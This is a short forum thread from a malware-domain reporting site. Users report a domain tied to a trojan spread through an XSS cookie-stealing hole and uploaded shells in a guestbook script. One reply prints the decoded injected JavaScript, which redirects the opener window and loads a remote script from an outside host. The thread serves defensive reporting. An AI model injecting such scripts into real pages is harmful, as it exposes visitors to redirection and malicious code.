Malware Domain List

Malware Related => Malicious Domains => Topic started by: gimcnuk on February 16, 2011, 02:37:11 pm

Title: Trojan - bestxxx.org
Post by: gimcnuk on February 16, 2011, 02:37:11 pm
Please, add in Your base following domain: bestxxx.org

Code: [Select]
http://bestxxx.org/images/s.js Trojan
Hacking is going through hole in script GB Top-Directory (http://gbscript.com/)
1. XSS-injection with stealing cookies from admin section through this script: bestxxx.org/images/img.php?
2. Uploading shells on server and inserting JS-code from this page: bestxxx.org/images/s.js

Details (in russian) here: http://mastertalk.ru/topic127171.html - there also decoded version of trojan
Russian support of hosting only deletes scripts but lately its was restored in the same places.

Thanks.
Title: Re: Trojan - bestxxx.org
Post by: SysAdMini on February 16, 2011, 08:21:34 pm
I'm sorry, but I can't reproduce what you reported.

hxxp://bestxxx.org/images/img.php? just returns a gif image.

bestxxx.org/images/s.js decodes to
Code: [Select]
<script type='text/javascript'>if (parent.window.opener) parent.window.opener.location='http://xtds.in';</script>
<script language="javascript" src="http://www.clayaim.com/index.php?ref=webex"></script>

Neither hxxp://xtds.in nor hxxp://www.clayaim.com/index.php?ref=webex leads me to any malware.
Title: Re: Trojan - bestxxx.org
Post by: gimcnuk on February 17, 2011, 01:27:11 pm
This code was inserted into many sites. By abuse it was deleted but lately restored in the same place, that means this code added by owner site.